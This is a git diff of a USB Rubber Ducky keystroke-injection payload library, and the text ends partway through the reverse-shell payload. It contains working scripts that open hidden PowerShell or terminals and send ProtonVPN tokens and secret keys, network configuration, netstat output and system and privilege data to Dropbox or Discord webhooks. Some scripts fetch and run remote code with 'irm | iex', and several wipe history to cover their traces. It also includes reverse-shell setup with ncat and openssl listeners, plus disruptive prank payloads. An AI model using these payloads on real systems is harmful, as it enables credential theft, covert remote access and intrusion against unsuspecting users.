shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces. + +## Getting Started + +### Dependencies + +* Internet Connection +* Dropbox Token + +### Executing program + +* Plug in your device + +### Settings + +* Set the Dropbox token \ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt new file mode 100644 index 0000000..91230a9 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt @@ -0,0 +1,96 @@ + +REM ########################################################## +REM # | +REM # Title : Exfiltrate Linux Network Configuration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration, Execution | +REM # Target : Linux | +REM # | +REM ########################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + +DELAY 1000 +CTRL-ALT t + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + +REM DELAY 500 +REM STRING USER_NAME=$(whoami) +REM ENTER + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER +DELAY 500 +STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" +ENTER + +REM Folder path +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) +ENTER + +DELAY 500 +STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt" +ENTER + +DELAY 1000 +STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" +ENTER + +DELAY 1000 +STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" +ENTER + +DELAY 1000 +REM Delay for zipping operation, it depends by computer power and folder directory +STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" +DELAY 3000 + + +REM Set yout Dropbox folder name +DEFINE DROPBOX_FOLDER_NAME example +STRING DROPBOX_FOLDER="/ +ENTER +STRING DROPBOX_FOLDER_NAME +ENTER +STRING " +ENTER +DELAY 500 + +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +DELAY 2000 +STRING history -c +ENTER + +DELAY 500 +STRING rm -rf "$TMP_FOLDER_PATH" +ENTER + +DELAY 500 +STRING rm -rf "$ZIP_PATH" +ENTER + +DELAY 500 +STRING exit +ENTER \ No newline at end of file diff --git a/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 new file mode 100644 index 0000000..a36a30f --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/ProtonVPN-config.ps1 @@ -0,0 +1,37 @@ +$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config" + +$Content = Get-Content -Path $Path + +$text = $Path + $Content + +# Discord Connection +$hookurl = "$discord" + +# Loop for Discord +$ConstantLimitForRestMethod = 1999 +$TMP_Body = @{ + 'username' = $env:username + 'content' = "" +} + for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){ + try { + $TMP_Body = @{ + 'username' = $env:username + 'content' = $text.Substring($i, $ConstantLimitForRestMethod) + } + } catch [ArgumentOutOfRangeException] { + if($text.Length-$i -gt 0){ + $TMP_Body = @{ + 'username' = $env:username + 'content' = $text.Substring($i, $text.Length-$i) + } + } else { + break + } + } + Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json) +} + + +# Clear the PowerShell command history +Clear-History \ No newline at end of file diff --git a/payloads/library/exfiltration/ProtonVPN-config/README.md b/payloads/library/exfiltration/ProtonVPN-config/README.md new file mode 100644 index 0000000..dba980d --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/README.md @@ -0,0 +1,37 @@ +# ProtonVPN config file ✅ + +A script used to stole target ProtonVPN config file. + +**Category**: Credentials, Exfiltration + +## Description + +This script will stole target ProtonVPN config file. + +Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +In the config file you can find a lot information about the user like: +- UserUid +- UserAccessToken +- UserRefreshToken +- UserAuthenticationPublicKey +- UserAuthenticationSecretKey +- UserAuthenticationCertificatePem +- UserCertificationServerPublicKey +- and so on... + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* ProtonVPN user logged at least one time +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke Get-Content for get in plaintext the ProtonVPN .config content +* Invoke-WebRequest will be entered in the Run Box to send the content + diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt new file mode 100644 index 0000000..796d694 --- /dev/null +++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt @@ -0,0 +1,43 @@ +REM ################################################################### +REM # | +REM # Title : ProtonVPN-config-to-Discord-Exfiltration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Credentials, Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ################################################################### + +REM Title: ProtonVPN-config-to-Discord-Exfiltration +REM Author: Aleff +REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +REM In the config file you can find a lot information about the user like: +REM - UserUid +REM - UserAccessToken +REM - UserRefreshToken +REM - UserAuthenticationPublicKey +REM - UserAuthenticationSecretKey +REM - UserAuthenticationCertificatePem +REM - UserCertificationServerPublicKey +REM - and so on... +REM Then it cleans up traces of what you have done after. +REM Target: Windows 10-11 (PowerShell + ProtonVPN software) +REM Version: 1.0 +REM Category: Credentials, Exfiltration +REM Requirements: ProtonVPN user logged at least one time and internet connection +REM + +REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks// +DEFINE WEBHOOK example.com + +DELAY 2000 +GUI r +DELAY 250 +DELETE +STRING powershell -w h -ep bypass $discord=' +STRING WEBHOOK + +REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1 +DEFINE PAYLOAD example.com +STRING ';irm PAYLOAD | iex +ENTER diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md b/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md index 061f0e3..2f0b3bf 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md @@ -6,7 +6,7 @@ ## Description -This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.* +This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.* ## Usage @@ -34,9 +34,9 @@ This payload exfiltrates Windows system information and installed programs from - **Prepare your payload** - - Download the Powershell script ".ps1". + - Download the Powershell script "script.ps1". - Modify it to include the , , and of your application. - - Upload your modified ".ps1" file to Dropbox and copy the upload link. + - Upload your modified "script.ps1" file to Dropbox and copy the upload link. - Replace the end of the link from "?dl=0" to "?dl=1" *This is your "".* - Download the "payload.txt" file. @@ -44,9 +44,13 @@ This payload exfiltrates Windows system information and installed programs from ### Analysis -Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system. +Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system. -The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com). +You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system. + +You can check if the user has dangerous permissions that can be exploited. + +The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com). --- diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt b/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt index 24e2dcf..a3752e5 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt @@ -12,6 +12,6 @@ GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr STRING DOWNLOAD_LINK -STRING ; invoke-expression $pl +STRING ; iex $pl DELAY 500 ENTER diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1 b/payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1 similarity index 69% rename from payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1 rename to payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1 index e233fd2..9a072a4 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1 +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/script.ps1 @@ -3,4 +3,4 @@ #Replace with the actual "Refresh Token" of your app. -Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = ""; client_id = ""; client_secret = ""}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null +Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = ""; client_id = ""; client_secret = ""}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null diff --git a/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 b/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 index 375173d..943e191 100644 --- a/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 +++ b/payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1 @@ -36,7 +36,11 @@ $headers = @{ #Define the report for the file upload -$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" +$body = "# System Information #`n $(SYSTEMINFO | Out-String)" + +$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)" + +$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" #Upload the report to Dropbox using the headers and body defined above diff --git a/payloads/library/exfiltration/Windows-Product-Duckey/README.md b/payloads/library/exfiltration/Windows-Product-Duckey/README.md index cb84b67..8ec1beb 100644 --- a/payloads/library/exfiltration/Windows-Product-Duckey/README.md +++ b/payloads/library/exfiltration/Windows-Product-Duckey/README.md @@ -16,10 +16,10 @@ This payload exfiltrate the target's Windows product key to a remote server. *On ``` python -m http.server 80 ``` -- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server. -- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address: +- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server. +- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address: ``` -http:///.ps1 +http:///script.ps1 ``` ### Analysis diff --git a/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt b/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt index 0060955..c192d07 100644 --- a/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt +++ b/payloads/library/exfiltration/Windows-Product-Duckey/payload.txt @@ -12,6 +12,6 @@ GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http:// STRING REMOTE_IP_ADDRESS -STRING /.ps1; invoke-expression $pl +STRING /.ps1; iex $pl DELAY 500 ENTER diff --git a/payloads/library/exfiltration/Windows-Product-Duckey/.ps1 b/payloads/library/exfiltration/Windows-Product-Duckey/script.ps1 similarity index 100% rename from payloads/library/exfiltration/Windows-Product-Duckey/.ps1 rename to payloads/library/exfiltration/Windows-Product-Duckey/script.ps1 diff --git a/payloads/library/exfiltration/Windows-netstat/README.md b/payloads/library/exfiltration/Windows-netstat/README.md new file mode 100644 index 0000000..309e994 --- /dev/null +++ b/payloads/library/exfiltration/Windows-netstat/README.md @@ -0,0 +1,41 @@ +# Windows netstat ✅ + +A script used to stole target netstat status. + +**Category**: Net, Exfiltration + +## Description + +This script will stole target netstat status. + +Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. + +Then it cleans up traces of what you have done after. + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +### Executing program + +* Plug in your device +* Invoke the indicated commands +* Invoke-WebRequest will be entered in the Run Box to send the content + +### Settings +Put 1 on the function that you want to active, else 0. +Functions available: +- default (*or simple 'netstat' command*) +- routing_table **$r** +- listening_canonical **$lc** +- listening_numerical **$ln** +- all_canonical **$ac** +- all_numerical **$an** +- offload **ot** +- proto **$p "\"** + - *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".* + + diff --git a/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 b/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 new file mode 100644 index 0000000..ab02861 --- /dev/null +++ b/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1 @@ -0,0 +1,79 @@ + +# Discord send function +function exfiltration () { + param( + [Parameter (Mandatory = $true, Position=0)] [String]$command, + [Parameter (Mandatory = $true, Position=1)] [String]$text + ) + # Loop for Discord + $ConstantLimitForRestMethod = 1999 + $TMP_Body = @{ + 'username' = $command + 'content' = "" + } + for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){ + try { + $TMP_Body = @{ + 'username' = $command + 'content' = $text.Substring($i, $ConstantLimitForRestMethod) + } + } catch [ArgumentOutOfRangeException] { + if($text.Length-$i -gt 0){ + $TMP_Body = @{ + 'username' = $command + 'content' = $text.Substring($i, $text.Length-$i) + } + } else { + break + } + } + Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json) + } +} + +# send command format +function send_command(){ + param( + [Parameter (Mandatory = $true, Position=0)] [String]$cmd + ) + $out = Invoke-Expression $cmd + (exfiltration $cmd [string]$out) +} + +# Settings +if ( $d -eq "1") { + $cmd = "netstat" + (send_command $cmd) +} +if ( $r -eq "1") { + $cmd = "netstat -r" + (send_command $cmd) +} +if ( $lc -eq "1") { + $cmd = "netstat -af" + (send_command $cmd) +} +if ( $ln -eq "1") { + $cmd = "netstat -an" + (send_command $cmd) +} +if ( $ac -eq "1") { + $cmd = "netstat -qf" + (send_command $cmd) +} +if ( $an -eq "1") { + $cmd = "netstat -qn" + (send_command $cmd) +} +if ( $o -eq "1") { + $cmd = "netstat -t" + (send_command $cmd) +} +if ( $p -ne "" ) { + # format $proto="TCP" + $cmd = "netstat -ps " + $p + (send_command $cmd) +} + +# Clear the PowerShell command history +Clear-History \ No newline at end of file diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt new file mode 100644 index 0000000..8728395 --- /dev/null +++ b/payloads/library/exfiltration/Windows-netstat/payload.txt @@ -0,0 +1,45 @@ +REM ################################################################### +REM # | +REM # Title : Windows-netstat-to-Discord-Exfiltration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Net, Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ################################################################### + +REM Title: Windows-netstat-to-Discord-Exfiltration +REM Author: Aleff +REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. +REM Put 1 on the function that you want to active, else 0. Functions available: +REM - default (simple 'netstat' command) +REM - routing_table $r +REM - listening_canonical $lc +REM - listening_numerical $ln +REM - all_canonical $ac +REM - all_numerical $an +REM - offload ot +REM - proto $p "" +REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="". + +REM Target: Windows 10-11 (PowerShell) +REM Version: 1.0 +REM Category: Net, Exfiltration +REM Requirements: Internet connection +REM + +REM REQUIRED - Provide your Discord WEBHOOK +DEFINE WEBHOOK https://discordapp.com/api/webhooks// + +DELAY 2000 +GUI r +DELAY 250 +DELETE +STRING powershell -w h -ep bypass $discord=' + +STRING WEBHOOK + +REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1 +DEFINE PAYLOAD example.com +STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex +ENTER diff --git a/payloads/library/mobile/WhatsappMessageSender/payload.txt b/payloads/library/mobile/WhatsappMessageSender/payload.txt new file mode 100644 index 0000000..1cd8eac --- /dev/null +++ b/payloads/library/mobile/WhatsappMessageSender/payload.txt @@ -0,0 +1,61 @@ +REM # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- +REM # TITLE: Whatsapp Message Sender +REM # +REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.0 +REM # +REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it. +REM # +REM # Tested OS: Android version 12 +REM # +REM # Note: Script won't work on locked devices +REM # +REM # Date: 08/03/2023 +REM # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +DEFINE PHONENUMBER +91XXXXXXXXXX +DEFINE MESSAGE Hi this is Gopalsamy Rajendran + +REM #------------------------------------------------- +REM # Below lines will open search engine and type https:// +DELAY 1000 +GUI r +DELAY 100 +STRING h +DELAY 100 +STRING t +DELAY 100 +STRING t +DELAY 100 +STRING p +DELAY 100 +STRING s +DELAY 500 +DELAY 100 +STRING : +DELAY 100 +STRING / +DELAY 100 +STRING / +DELAY 100 +REM #------------------------------------------------- + +REM #------------------------------------------------- +REM # Below lines will enter wa.me after https:// +REM # Replace the mobile number with your's + +STRING wa.me/ +STRING PHONENUMBER +ENTER +DELAY 5000 +REM #------------------------------------------------- + +REM #------------------------------------------------- +REM # Below message will be sent to the target number confiugured above +REM # Replace the message with your own message +STRING MESSAGE +TAB +TAB +ENTER +DELAY 1000 +REM #------------------------------------------------- + diff --git a/payloads/library/prank/EternalLock b/payloads/library/prank/EternalLock new file mode 100644 index 0000000..2aaee31 --- /dev/null +++ b/payloads/library/prank/EternalLock @@ -0,0 +1,54 @@ +REM EternalLock +REM Version 1.0 +REM OS: Windows / Unix +REM Author: 0iphor13 +REM Requirement: DuckyScript 3.0 +REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out) + +ATTACKMODE HID STORAGE + +REM Extension DETECT_READY by Korben for best and fastest deployment +EXTENSION DETECT_READY + REM VERSION 1.0 + + REM USAGE: + REM Extension runs inline (here) + REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic + REM boot delay + + REM TARGETS: + REM Any system that reflects CAPSLOCK will detect minimum required delay + REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + + REM CONFIGURATION: + DEFINE RESPONSE_DELAY 25 + DEFINE ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT)) + CAPSLOCK + DELAY RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +REM Delay until the machine gets locked +DEFINE #TRIPWIRETIME 3000 +REM Time between forced machine locks +DEFINE #LOCKTIME 100 + +WAIT_FOR_STORAGE_ACTIVITY +DELAY #TRIPWIRETIME + +BUTTON_DEF + WHILE TRUE + ATTACKMODE STORAGE + END_WHILE +END_BUTTON + +REM Lock machine until Button is pressed +WHILE TRUE +GUI l +DELAY #LOCKTIME +END_WHILE diff --git a/payloads/library/prank/HTML_Fork-Bomb/payload-ie.txt b/payloads/library/prank/HTML_Fork-Bomb/payload-ie.txt new file mode 100644 index 0000000..0b0630b --- /dev/null +++ b/payloads/library/prank/HTML_Fork-Bomb/payload-ie.txt @@ -0,0 +1,14 @@ +REM HTML Fork Bomb by Jonny Banana +REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb +DELAY 2000 +CONTROL ESCAPE +DELAY 200 +STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ +DELAY 200 +ENTER +REM set a long delay to give time to this disgusting browser +DELAY 1000 +REM it's time to enable Pop-Up +TAB +DELAY 200 +ENTER diff --git a/payloads/library/prank/HTML_Fork-Bomb/payload.txt b/payloads/library/prank/HTML_Fork-Bomb/payload.txt index 0b0630b..7aed289 100644 --- a/payloads/library/prank/HTML_Fork-Bomb/payload.txt +++ b/payloads/library/prank/HTML_Fork-Bomb/payload.txt @@ -3,11 +3,11 @@ REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb DELAY 2000 CONTROL ESCAPE DELAY 200 -STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ +STRING C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ DELAY 200 ENTER REM set a long delay to give time to this disgusting browser -DELAY 1000 +DELAY 2000 REM it's time to enable Pop-Up TAB DELAY 200 diff --git a/payloads/library/prank/silent_rickroll/README.md b/payloads/library/prank/silent_rickroll/README.md index f893b83..1c07aa1 100644 --- a/payloads/library/prank/silent_rickroll/README.md +++ b/payloads/library/prank/silent_rickroll/README.md @@ -8,7 +8,7 @@ This script does the following actions respectively + Runs Batch file *** -##Description +## Description The script was thought in a way that the payload could be executed in machines that have some level of protection and wont allow the user to open Run Dialog or CMD straight away Setting the volume to maximum is used with keystroke injection. diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/README.md b/payloads/library/remote_access/ReverseDuckyUltimate/README.md new file mode 100644 index 0000000..21cab52 --- /dev/null +++ b/payloads/library/remote_access/ReverseDuckyUltimate/README.md @@ -0,0 +1,56 @@ +# Title: ReverseDuckyUltimate + +

Author: 0iphor13
+OS: Windows
+Version: 1.0
+Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum

+ +**What is ReverseDuckyUlitmate?** +# +*ReverseDuckyUltimate (RDU) takes the best of every ReverseDucky payload. Customization, encryption, indentifiers, multi-layer polymorphism and automatic setup!* +*RDU is the ulitmate experience when it comes to remote access via your Rubber Ducky and it's so easy to use!* +# +## Instruction + +Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup). +- First: Create key.pem & cert.pem like so:
+``` +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes +``` +It will ask for information about the certificate - Insert whatever you want.
+ +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png) + +- Second: Start a listener on your attacking machine which supports certificates. + Examples: +``` +openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number] +ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem +``` +- Third: Define the IP-Address and Port of your listening machine within the payload. Additionally add an unique identifier to give your Duck a name. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png) + +- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go. + +## Instruction - Automatic Setup +- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png) + +- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky. + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png) + +- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go! + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png) +# + +![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png) + +Credit for DS 3.0 implentation and ideas: +- Daniel Bohannon +- Grzegorz Tworek +- Korben +- Nikhil Mittal diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png new file mode 100644 index 0000000..d185905 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png new file mode 100644 index 0000000..61d6042 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png new file mode 100644 index 0000000..c1a7c60 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png new file mode 100644 index 0000000..1538c96 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png new file mode 100644 index 0000000..dd80a63 Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png b/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png new file mode 100644 index 0000000..b28725b Binary files /dev/null and b/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png differ diff --git a/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt new file mode 100644 index 0000000..155de38 --- /dev/null +++ b/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt @@ -0,0 +1,357 @@ +REM ReverseDuckyUltimate +REM Version 1.1 +REM OS: Windows / Unix +REM Author: 0iphor13 +REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum +REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed. + +REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails +EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY 